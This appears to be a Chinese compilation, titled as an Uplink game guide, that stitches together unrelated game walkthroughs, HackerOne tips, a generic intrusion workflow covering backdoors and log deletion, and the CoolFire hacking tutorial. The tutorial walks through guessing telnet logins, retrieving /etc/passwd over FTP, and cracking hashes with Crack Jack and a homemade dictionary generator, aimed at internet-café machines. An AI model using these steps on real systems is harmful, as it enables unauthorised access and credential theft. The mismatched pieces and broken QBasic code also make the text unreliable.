uplink(黑客精英)完美中文攻略

尤里的复仇攻略1. 引言《尤里的复仇》是一款以战争为背景的即时战略游戏，在这个游戏中，玩家将扮演尤里一方的指挥官，带领自己的军队进行战斗，实施复仇计划。

本文将为玩家提供一些攻略和技巧，帮助玩家更好地完成游戏任务。

2. 游戏背景在游戏中，尤里是一位雄心勃勃的军事指挥官，曾经是盟军的一员，在某次任务中遭到军方的背叛，被剥夺了指挥权，为此他决定以复仇为驱动，建立自己的势力，推翻军方的统治。

3. 游戏基本操作在游戏中，玩家可以使用键盘和鼠标进行操作。

以下是游戏的基本操作：•使用鼠标左键选择单位或建筑物。

•使用鼠标右键进行命令操作，如移动、攻击等。

•使用键盘上的快捷键可以进行一些常用操作，如建造单位、生产建筑等。

4. 游戏策略在《尤里的复仇》中，玩家需要制定一些策略来战胜敌人并完成任务。

以下是一些游戏策略的建议：4.1 兵种搭配不同的兵种拥有不同的属性和技能，正确的兵种搭配可以让你的部队更强大。

例如，你可以使用防御型单位来吸引敌人的火力，然后再派遣高输出的单位进行攻击。

4.2 采取合理的防守措施在游戏中，敌人可能会对你的基地进行进攻，因此你需要采取一些合理的防守措施来保护自己的基地。

建造防御塔和设置陷阱是非常有效的防守方法。

4.3 发展经济良好的经济发展是游戏胜利的基础。

你需要合理规划资源的采集和使用，建造经济建筑来增加资源产出，并尽量保持资源的平衡。

4.4 利用地形地形在战斗中起着重要作用，你可以利用山脉、河流等地形阻挡敌军的进攻，也可以利用地形进行伏击或埋设炸弹。

5. 游戏中的任务在游戏中，玩家需要完成一系列的任务来推动剧情的发展。

以下是一些常见的任务类型：•消灭敌人：击败敌方的所有单位和建筑。

•保护目标：保护某个重要的单位或建筑物不被敌方摧毁。

•采集资源：收集指定数量的资源。

6. 结论《尤里的复仇》是一款充满策略性和挑战性的即时战略游戏。

通过合理的策略和技巧，玩家可以完成游戏中的各项任务，并与敌人展开激烈的对战。

hackone技巧
Hackone是一家知名的网络安全公司，提供漏洞奖励计划，帮助企业发现和修复安全漏洞。

作为一名安全研究人员，要想成功地在Hackone上发现安全漏洞并得到奖励，需要掌握一些技巧。

首先，了解并掌握漏洞发现的基本原理和方法。

这包括了解常见的漏洞类型，熟悉各种工具和技术，以及对应用程序和系统的深入了解。

只有掌握了基本技能，才能更好地发现安全漏洞。

其次，要注重细节，全面分析应用程序或系统的每个细节。

在寻找漏洞时，不能只关注于表面上的漏洞，还要深入到代码层面和系统层面进行分析。

在这个过程中，需要有耐心和细心，不要错过任何一个细节。

同时，要加强与其他安全研究人员的沟通和合作。

在Hackone平台上，可以与其他研究人员合作共同寻找漏洞，相互学习和交流经验。

这不仅可以提高自己的技能，还可以扩展自己的人脉和资源。

最后，要注意遵守Hackone平台的规则和道德准则。

在漏洞发现过程中，不要进行非法操作或侵犯隐私，要保持诚信和专业精神。

只有这样，才能得到平台的认可和信任，获得更多的机会和奖励。

综上所述，要想在Hackone平台上成功地发现安全漏洞，需要掌握基本技能，注重细节，加强合作，遵守规则。

只有不断提升自己的实力和素质，才能在这个竞争激烈的领域获得更多的机会和成功。

合金装备1攻略F2 无敌模式F4 弹药无限F5 普通视角F6 观察视角F7 快速重启关卡F8,F9,F11,F12 贴图模式开关隐藏秘密A.通关后1. 得到STEALTH隐形迷彩: 最后时救出博士(被拷问时按SELECT放弃)。

2. 得到BANDANA无限弹药: 最后时救出Meryl(被拷问时硬扛——连按'Action')。

3. 得到CAMERA照相机: 通关前取得照相机。

4. 若第一及第二次分別救Meryl及Otakon博士，第三次遇到忍者时……（他换衣服了）5. 在分別救Meryl及Otakon博士后，第三次翻版时ENDING会是新的MUSIC！（动感十足）。

6. 获得最高评价BIG BOSS(大老板？):在不使用雷达的情况下被发现次数小于4、杀敌数25人以下、压缩饼干使用小于1、在3小时之内翻版、不能接关！心语：这才是007类的SPY！7. 翻版后看特别模式，增加了一个主观模式。

心语：难控制 :( 连按'三角'2次进入主观模式，之后连按'三角'2次退出。

附:捡东西时一定要趴下!8. 不是心得的心得: 翻版后敌人的位置会改变.B.一些细节1. 在和WOLF狙击手对决的通道里，连续射杀水管上的老鼠会有漂亮的MM骂你！内容自己看吧！！若连续杀死2只乌鸦，Roy Campbell会CALL你！！！2. 闹剧:在卡车上躲在箱子里,忍几秒!你会被运到箱子上所写的地址3. 在医务室被关时, 当逃走后不要打死那个士兵, 让他跟着你到电刑室. 他会因为'肚子问题'上厕所,这时你去敲厕所门,看看他的反应4. 在接受Revolver Ocelot的拷问时忍耐5次，等待忍者来搭救，逃出牢房後所有武器弹药全满!5. 装备STEALTH隐形迷彩拖着敌人可以进入要CARD KEY的房间.6. 神秘电台: 140.07---制作人员的密语. 140.66---在峡谷、连接通道、雪原拨通，可以听到怪声！！！！ 141.52---武器专家.7. 金刚不坏之身:当然不是说你! 是一只狼!在玩DISC 2后回到之前埋葬狙击手的地方.那里有只小狼,它是不死之身!有兴趣拿它练练枪法!好象狼窝里也有一只!?8. 若是连续3次呼叫美铃并且不存档，她会生气大骂，第4次她的表情会因生气而表情及态度有所变化。

看门狗2黑客技能和任务解决攻略看门狗2是由育碧制作的一款开放世界动作冒险游戏，故事背景设定在一个虚构的芝加哥城市。

在游戏中，玩家扮演一名黑客，利用各种黑客技能来解决任务和挑战。

本文将为您介绍一些核心的黑客技能和任务解决攻略，帮助您更好地玩转这款游戏。

一、黑客技能1. 黑客视野（Hacker Vision）：这是一项基础黑客技能，在游戏一开始就可以解锁。

通过激活黑客视野，玩家可以看到周边的电子设备和人物，并获取有用的信息。

这个技能在整个游戏过程中都非常重要，可以帮助玩家发现潜在的目标和隐藏的敌人。

2. 远程控制（Remote Control）：远程控制是游戏中最重要的黑客技能之一。

玩家可以远程控制各种设备，如汽车、无人机、路灯等，来解决任务和配合战斗。

通过远程控制，玩家可以操控无人机进行侦查，使汽车失控来躲避追踪，或者使用路灯来制造障碍物等等。

3. 黑客工具（Hacking Tools）：除了基本的黑客技能外，玩家还可以使用各种黑客工具来辅助游戏进行。

比如，可以使用黑客枪来对敌人进行攻击，使用隐蔽装置来避免被监控，或者使用控制设备来干扰敌人的通信。

这些工具在各种任务中非常有用，可以让玩家更有优势地完成任务。

二、任务解决攻略1. 数据泄漏任务：在这个任务中，玩家需要入侵某个组织的服务器，获取重要的机密文件。

首先，使用黑客视野寻找潜在的入侵点，然后远程控制无人机进入目标区域。

利用无人机的摄像头，找到安全系统的漏洞并入侵服务器。

完成任务后，及时离开，避免被敌人发现。

2. 交通混乱任务：这个任务要求玩家通过黑客技能来制造交通混乱，帮助盟友逃离追击。

首先，使用远程控制技能打乱交通信号系统，引发车祸，制造混乱。

然后，使用黑客工具来关闭摄像头和警报器，以避免被监控。

最后，使用黑客视野帮助盟友成功逃离，并及时逃离现场。

3. 黑客大赛任务：这个任务是游戏中的一项重要挑战，需要玩家在限定时间内完成一系列黑客挑战。

在黑客大赛中，玩家需要利用各种黑客技能和工具，完成不同的任务，如入侵服务器、解密密码等。

黑上钥匙任务流程在进行黑上钥匙任务之前，首先需要了解任务的背景和流程。

黑上钥匙任务是一项需要高度保密和技术水平的任务，通常由专业的黑客团队来执行。

本文将介绍黑上钥匙任务的一般流程，以供参考。

1. 任务准备阶段。

在开始执行黑上钥匙任务之前，团队成员需要进行充分的准备工作。

这包括收集目标信息、分析目标系统漏洞、准备必要的工具和软件等。

在此阶段，团队成员需要密切配合，确保每个人都清楚自己的任务和责任。

2. 入侵目标系统。

一旦准备工作完成，团队成员将开始尝试入侵目标系统。

这可能涉及利用漏洞进行远程攻击、社会工程学手段获取密码、或者其他技术手段。

在此阶段，团队成员需要保持高度的警惕和专注，确保不被目标系统的安全措施发现。

3. 获取管理员权限。

一旦成功入侵目标系统，团队成员将努力获取管理员权限。

这可能需要绕过系统的防护措施、提升自己的权限等。

在此阶段，团队成员需要充分发挥自己的技术水平和创造力，确保能够顺利获取管理员权限。

4. 完成任务目标。

一旦获得管理员权限，团队成员将开始执行任务目标。

这可能包括窃取机密信息、篡改系统数据、植入后门等。

在此阶段，团队成员需要严格遵守任务目标，确保不留下任何痕迹。

5. 清理痕迹。

完成任务后，团队成员将对入侵行为进行清理，以确保不留下任何痕迹。

这可能包括删除日志、恢复系统原状等。

在此阶段，团队成员需要保持高度的谨慎和技术水平，确保不被目标系统的安全人员发现。

总结。

黑上钥匙任务是一项高度复杂和危险的任务，需要团队成员具备高超的技术水平和严密的合作配合。

在执行任务过程中，团队成员需要保持高度的警惕和专注，确保任务能够顺利完成并且不留下任何痕迹。

希望本文介绍的黑上钥匙任务流程能够对相关人员有所帮助。

法克侠9部攻略(一)法克侠9部攻略一、背景介绍1.法克侠9部是一款受欢迎的游戏，具有多样的角色和剧情选择。

2.游戏设定在一个奇幻的法克侠世界中，玩家需要扮演不同的角色进行冒险和战斗。

二、角色选择1.玩家可以选择不同的角色进行游戏，每个角色都有唯一的特殊技能和属性。

–法师：擅长控制元素和使用魔法攻击。

–战士：拥有强大的近战攻击和防御能力。

–射手：精通远程攻击和敏捷的移动能力。

–刺客：专注于暗杀和潜行，具备高爆发和敏捷性。

三、任务与剧情1.游戏中有多个任务和剧情线索，玩家需要完成各种任务来解锁新的剧情和奖励。

2.任务类型包括救援任务、杀怪任务、搜集物品等，每个任务都会有不同的挑战和奖励。

四、战斗技巧1.在战斗中，玩家需要合理利用角色的技能和属性，选择合适的战斗策略。

2.攻击时，可以利用角色的技能组合进行连击，提升伤害输出。

3.防御时，要观察敌人的攻击模式，合理躲避和格挡攻击，保证自身安全。

4.战斗时要注意团队协作，合理分配角色的任务和位置，提高战斗效率。

五、装备和升级1.游戏中可以通过击败敌人或完成任务来获得装备和道具。

2.不同的装备和道具有不同的属性加成和效果，玩家可以根据角色特点选择合适的装备。

3.可以通过击败强敌来获得装备的升级材料，提升装备品质和属性。

六、社交互动1.在游戏中，可以与其他玩家进行社交互动，交流游戏经验和分享攻略。

2.加入公会或组队进行战斗，提升游戏乐趣和挑战性。

3.参加游戏活动和竞技场，与其他玩家一较高下，展示实力和技巧。

七、游戏技巧1.提前了解游戏功能和界面，熟悉操作方式和快捷键，提高游戏流畅度。

2.经常参与游戏活动和福利，获取丰厚的游戏奖励。

3.关注游戏官方社交平台和论坛，了解最新的游戏资讯和更新内容。

4.多和其他玩家交流，借鉴他们的游戏经验和策略，提升自己的游戏技巧。

以上是关于《法克侠9部》的详细攻略，希望对你的游戏旅程有所帮助！八、资源管理1.在游戏中，玩家需要合理管理自己的资源，包括金币、经验、能量等。

密室逃脱--黑客攻略我们定义第一个有逃生门的场景为场景一；往右，有破碎电脑屏的场景为场景二；再往右，有上了锁的柜子的为场景三；最后，放有一张床的为场景四。

游戏开始：场景谜题解锁场景三上了锁的柜子场景四中用拳头打开床左侧桌子上的抽屉，获得钥匙。

场景三笔记本电脑解锁场景一中下门缝中的信封密码为“eter”，得到屏幕上的冬日松树林照片。

场景三打印机运作放入场景一中点击获得的门左侧纸盒里的油墨盒和场景二中电脑右边的纸张场景二启动台式电脑准备工作：场景一拳头打击门右边的木桶，获得电源；场景三柜子中获得白色粉末；场景二台式电脑旁获得相机；场景二桌下主机中获得小刀。

电脑桌下方连接场景四中床下得到的电源线；电脑连接从柜子中得到的鼠标；将指纹放到电脑左边的长方体盒子---***指纹获取：电源(can)和白色粉末组合，显示电源上的指纹，相机为其拍照，相机插到打印机上，打印出纸质版带有指纹的电源，小刀与纸片结合，获得指纹。

场景二主机的启动准备工作：场景一用拳头打击门右边的木桶，没有镜片的头戴式受话器；场景一用拳头用拳头取下门上的猫眼镜片；场景三：点击获取打印机钱的放大镜，拳头将放大镜镜片取出；以上三种结果组合，获完整头戴式受话器。

场景四枕头下获得优盘。

用受话器看桌子下主机，得：需解三个密码才获得开门钥匙。

密码一：“0x”--**场景二和场景四墙壁上海报中的一系列数字得“0xBAD”，利用场景二中桌子左边架子下边的纸团中的六进制算法的密码为B（11）x 16^2+A(10) x 16^1+ D(13) x 16^0=“2989”密码二：三顶帽子--**场景一，场景三，场景四中对应帽子上的数字即为密码“267”密码三：松树林--**场景三将优盘插如笔记本电脑，点击放大到电脑屏幕页面，屏幕中点击荧光棒得到密码“1827”主机外拿到钥匙快开门逃吧！>-<。

红客的基本操作方法红客（Hacker）是指一种利用计算机技术进行攻击、侵入和操控计算机系统的人。

他们具备广泛的计算机知识和技能，能够利用各种漏洞和技术手段，获取系统的未授权访问权或者获取敏感信息。

下面将介绍红客的基本操作方法。

1. 信息收集：红客在进行攻击前首先需要对目标进行信息收集。

他们会利用各种工具和技术手段，寻找目标的漏洞和弱点。

信息收集的途径包括网络搜索、域名查询、端口扫描、操作系统识别等。

通过收集到的信息，红客能够更好地了解目标系统的架构、漏洞和弱点，为后续的攻击做准备。

2. 漏洞扫描：在信息收集的基础上，红客会对目标系统进行漏洞扫描。

他们使用各种漏洞扫描工具，扫描系统中的各种漏洞和弱点。

扫描的目的是找到系统中存在的易受攻击的漏洞，以便后续的攻击利用。

3. 钓鱼攻击：钓鱼攻击是指通过虚假的信息诱骗用户点击恶意链接或下载恶意文件，从而获取用户的账号密码或者控制用户的计算机。

红客会伪装成合法的机构或者个人，发送钓鱼邮件或者制作钓鱼网站，诱使用户点击链接或者输入敏感信息。

钓鱼攻击是一种常见的社交工程手段，红客通过利用用户的信任心理，获取系统的访问权限。

4. 远程攻击：远程攻击是指通过网络远程控制目标系统或者执行恶意代码。

红客利用漏洞和弱点，传递恶意代码到目标系统，实现远程控制。

远程攻击可以包括利用系统漏洞获取控制权、利用远程执行漏洞执行恶意代码等。

5. 社会工程：社会工程是指通过欺骗和操纵人们的心理，获取系统的访问权限或者敏感信息。

红客通过与目标人员进行交流，获得关键信息，比如账号密码、员工凭据等。

社会工程主要通过电话诈骗、伪装成合法人员或者利用用户的弱点等手段实施。

6. 拒绝服务攻击：拒绝服务攻击是指通过发送大量请求，占用系统资源或者使系统崩溃，从而使系统无法正常服务。

红客可以利用各种手段，比如发送大量的数据包、利用系统漏洞等方式进行拒绝服务攻击。

拒绝服务攻击是一种常见的攻击手段，可以对目标系统造成严重的影响。

CoolFire系列讲座第1讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!#1 甚么是Hacking ?就是入侵电脑! 有甚么好解释的! 大部份有关介绍Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最好不要成为一个"骇客", 我... 不是!#2 为甚么要Hack ?我们只是为了要解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作!! 为了安全性而作革命!#3 Hack 守则1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料!!2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状.3. 不要轻易的将你要Hack 的站台告诉你不信任的朋友.4. 不要在bbs 上谈论你Hack 的任何事情.5. 在Post 文章的时候不要使用真名.6. 正在入侵的时候, 不要随意离开你的电脑.7. 不要侵入或破坏政府机关的主机.8. 不在电话中谈论你Hack 的任何事情.9. 将你的笔记放在安全的地方.10. 想要成为Hacker 就要真正的Hacking, 读遍所有有关系统安全或系统漏洞的文件(英文快点学好)!11. 已侵入电脑中的帐号不得清除或修改.12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开!!13. 不将你已破解的帐号分享与你的朋友.#4 破解之道1. 进入主机中2. 得到/etc/passwd3. 得到系统帐号4. 得到最高权限-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 1.进入主机有好几种方式, 可以经由Telnet (Port 23) 或SendMail (Port 25)或FTP 或WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多项服务, 所以如果你只是要"进入" 该主机, 这些Port 都是很好的进行方向. 当然还有很多Port, 但是DayTime 的Port 你能拿它作甚么??? 我不知道, 你知道吗?!底下的示范并不是像写出来的那么容易, 只不过是要让你解如何进入, 当然其中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了面子.... 一定要删掉这些不堪入目的东西嘛...示范进入主机的方法: (By CoolFire)(首先要先连上某一台你已经有帐号的Telnet 主机, 当然最好是假的, 也就是Crack过的主机, 然後利用它来Crack 别的主机, 才不会被别人以逆流法查出你的所在)Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0(我用的是 ... 当然是假的罗, 都已经经过修改了啦!!没有这一台主机啦!! 别怕! 别怕! 以下的主机名称都是假的名称, 请同学们要记得!!)Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是......)> telnet (Telnet 试试看....)Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(没关系, 再来!!)cool login: hinetPassword:Login incorrectcool login:(都没猜对, 这边用的是猜的方法, 今天运气好像不好)telnet> closeConnection closed.(重来, 换个Port 试试看!!)> telnet 111.222.255.255 80Trying 111.222.255.255...Connected to 111.222.255.255.Escape character is '^]'.<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>Error 400</H1>Invalid request "" (unknown method)<P><HR><ADDRESS><A HREF="">CERN-HTTPD 3.0A</A></ADDRESS></BODY></HTML>Connection closed by foreign host.(哇哩!! 连密码都没得输入, 真是..... 再来!! 要有恒心!!)(换FTP Port 试试)> ftp 111.222.255.255Connected to 111.222.255.255.220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (111.222.255.255:FakeName): anonymous331 Guest login ok, send your complete e-mail address as password.Password:230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@230-If you do have problems, please try using a dash (-) as the first character230-of your password -- this will turn off the continuation messages that may230-be confusing your ftp client.230-230 Guest login ok, access restrictions apply.Remote system type is UNIX.Using binary mode to transfer files.(哇! 可以用anonymous 进来耶!! password 部份输入aaa@ 就好了! 不要留下足迹喔!!)ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.etcpubusrbinlibincomingwelcome.msg226 Transfer complete.(嗯嗯... 太好了! 进来了!! 下一个目标是.....)ftp> cd etc250 CWD command successful.ftp> get passwd (抓回来!!)200 PORT command successful.150 Opening BINARY mode data connection for passwd (566 bytes).226 Transfer complete.566 bytes received in 0.56 seconds (0.93 Kbytes/s)(喔... 这么容易吗??)ftp> !cat passwd (看看!!!)root::0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashftp:*:404:1::/home/ftp:/bin/bash(哇哩... 是Shadow 的... 真是出师不利.... )ftp> bye221 Goodbye.(不信邪.... 还是老话, 要有恒心....)(FTP 不行, 再Telnet 看看!!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(又猜错!!)cool login: fuckyouPassword:Last login: Mon Dec 2 09:20:07 from 205.11.122.12Linux 1.2.13.Some programming languages manage to absorb change but withstand progress.cool:~$(哇哈哈!! 哪个笨root, 用system name 作username 连password 也是system name.... 总算... 没白玩...)cool:~$ systembash: system: command not found(嗯... 这个user 的权限好像不大....)cool:~$ lscool:~$ pwd/home/fuckyoucool:~$ cd /cool:/$ lsPublic/ cdrom/ lib/ mnt/ tmp/ www/README dev/ linux* proc/ usr/bin/ etc/ local/ root/ var/boot/ home/ lost+found/ sbin/cool:/$ cd etctelnet> quit(好想睡呀!! 不玩了!! 下节课再开始....)Connection closed.> exit(走了!! 下节课在见啦!! 今天就上到这里! 老师要先下班了!!)(有学生说: 骗人! 还没有破解呀!! 胡说! 不是已经进来了吗???看看这节课上的是甚么??? ---->进入主机!! 嗯.....)-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 2.上节课抓回来一个"乱七八糟" 的/etc/passwd, 你以为我的真那么笨吗?? guest 所抓回来的能是甚么好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已经"猜" 到了一个不是guest 的username 及password. 今天就以它来进入主机瞧瞧!!Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是.....呵...)> telnet (Telnet 试试看.... 昨天的位址, 有作笔记吧!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrectcool login: fuckyouPassword: (一样输入fuckyou)Last login: Mon Dec 1 12:44:10 from Linux 1.2.13.cool:~$ cd /etccool:/etc$ lsDIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpc NETWORKING group mail.rc securetty NNTP_INEWS_DOMAIN host.conf motd sendmail.cfX11@ hosts messages/ sendmail.stXF86Config hosts.allow mtab servicesat.deny hosts.deny mtools shells bootptab hosts.equiv named.boot shutdownp csh.cshrc hosts.lpd networks snoopy/ csh.login httpd.conf nntpserver slip.hosts exports inetd.conf passwd snooptab fastboot inittab passwd.OLD syslog.conf fdprm issue passwd.old syslog.pid fstab ld.so.cache printcap ttys ftpaccess ld.so.conf profile utmp@(找寻目标..... 太乱了! 懒得找, 再来....)cool:/etc$ ls pa*passwd passwd.OLD passwd.old(果然在)cool:/etc$ more passwd(看看有没有Shadow...)root:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(正点! 一点都没有防备!!)cool:/etc$ exitlogout(走了!.... 换FTP 上场!!)Connection closed by foreign host.> ftp Connected to .220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (:66126): fuckyou331 Password required for fuckyou.Password:230 User fuckyou logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd /etc250 CWD command successful.ftp> get passwd200 PORT command successful.150 Opening BINARY mode data connection for passwd (350 bytes).226 Transfer complete.350 bytes received in 0.68 seconds (1.9 Kbytes/s)ftp> !cat passwdroot:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(看看! 呵! 假不了!!......)ftp> bye221 Goodbye.> exit(闪人罗!! 下课!!.... 喔慢点, 还有事要说明......)passwd 的Shadow 就是把passwd 放在shadow 档中, 而你原先在第一节课所看到的这个格式的passwd 并不是真正的passwd....root::0:0:root:/root:/bin/bash因为密码的部份没有东西.... 所以拿了也没有用!! 但这一节课所拿到的东西呢, 像是这样, 有几点需要说明的, 就是它究竟代表著甚么???john:234ab56:9999:13:John Smith:/home/john:/bin/sh它以":" 分成几个栏位, 各栏位对照如下:User Name: johnPassword:234ab56User No: 9999Group No: 13Real Name: John SmithHome Dir: /home/johnShell: /bin/sh了吧! 了吧! 保留著你千辛万苦所拿到的passwd, 咱们第三节课再来告诉各位如何使用Crack Jack 把passwd 解码.... 呵呵... zzZZzZzz...-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-Crack Jack V1.4 中文使用说明(By CoolFire 12-1-1996)嗯... 该到第三课了!! 累了的同学先去喝口水吧!这一节课咱们来说说Crack Jack ! 这可是个解读/etc/passwd 的好工具喔, 不要告诉我你习惯用Brute, 拿Brute 跟Crack Jack 的速度比比看, 包准你马上投向Crack Jack 1.4 的怀抱, 但请先确定你所使用的是Crack Jack 1.4, 你可以在CoolFire 的Hacker&Mailer Page 中拿到这个版本的Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上! 但还是要讲讲它的缺点... 就是只能在DOS 跟OS2 中跑, 如果在Windoz 95 上开个DOS Mode 跑, 它可是连理都不会理你的!OK! 现在切入正题! etc/passwd 拿到手了吧!! 开始罗!! 使用Crack Jack 1.4 前所需要的东西有这些[1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在Unix 系统中的/etc/ 目录中找到passwd [3] 字典档(哪里找, 自己敲... 呵ClayMore 中有一份DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用Crack Jack 1.4 前需先确定你所使用的机器是386 含以上CPU 的! 然後最好有充足的记忆体!!开始Jack 时只要敲入JACK 即可, 它会问你PW Name... 输入你的passwd 档名, DictionaryName 输入你的字典档名, Jack 就会开始找了! 找到时会告诉你, 也会在JACK.POT 中写入它所找到的密码!! 但... 有点怪的格式! 如果找到的是具root 权限的密码, Jack 会告诉你This isJackAss... 嗯...说脏话了!! 因为使用Jack 占用的时间实在太多, 如果你中途想要停掉时只要按下Ctrl-C 即可, 别以为你前功尽弃了! 因为Jack 有个Restore 的功能, 中断时会自动存档为RESTORE, 下次要继续这次的寻找只要输入Jack -Restore:RESTORE 即可!! 当然你也可以为你的Restore 重新命名! Jack 也会找得到的... 如Ren restore restore.HNT 之後要再寻找的时後就Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的Restore 前次所寻找的字串...继续帮你找下去....字典档哪里找: 我的不给你! 可以找别的Brute Force 之类的程式, 有些里面会附, 或是找找其它的Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有一点资料栏位及写程式的基础.[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的root 权限密码! Jack 好正点呀!!!所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧!!继续CoolFire系列讲座第2讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!话说上次CoolFire 讲到许多的Net Coffee 店, 安全性之差实在是没话说,但是过了这麽久也不见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像CoolFire这样温和, 如果遇到的是比较狠一点的角色, 那你的Net Coffee 可能要有一两天只卖Coffee 而没办法再Net 下去了!!继CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢?? 这次咱们不谈新的花招,用用之前所讲的再来探险一番, 当然, 这一次我照往例还是不会使用真正的Domain Name 来作教学,但是课程中的所有内容绝对属实, 当然本次攻击的对象还是.... Net Coffee Shop....**谈一下Crack Jack 猜猜密码许多人从上一次介绍Crack Jack 之後就应该已经领教过它的功力了,但是有几点需要说明的,有些人使用Jack 来帮你寻找password, 我就当你已经抓到了没有shadow 的/etc/passwd,但是为甚麽使用Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为Jack 还是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字,那当然连一个小小帐号的密码你都别想猜到了. 数一下你所使用的字典档中有多少字???我用的字典档有十九万多个字, 你的呢? 是不是小巫见大巫呀?? 那麽就赶快充实一下字典档再重新寻找吧!!许多人的密码都有一定的法则, 我自己写了PaSs2DiC 就是将UserName 由passwd档转成字典档的工具, 这是对一些喜欢使用UserName 当作Password 的人最好的方式,但是也曾经好运的找到别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的ID 作为密码的???你可以很简单的使用Qbasic 来制作"序数" 密码, 或日期密码, 底下简单的作一个0101 (一月一日) 到1231 的密码档出来:------------Cut Here MakeDate.BAS -------------------Open "Dates" for output as #1for I=1 to 12for J=1 to 31I1$=rtrim$(ltrim$str$(I)))J1$=rtrim$(ltrim$str$(J)))if len(I1$)=1 then I1$="0"+I1$if len(J1$)=1 then J1$="0"+J1$Out$=I1$Content$J1$print #1,Out$next Inext Jclose------------ Cut Here End MakeDate.BAS ----------------这支小程式将会写一个"DATES" 的档案, 里面就是你要的字典, 当然啦,这只是包含月跟日!!如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再Run 一次试试看了,不过这是一个好的开始不是吗??**如何保护自己的密码谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解,请遵守以下的原则: [1]不用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大) [3]不用身份证字号作为密码(LetMeIn! 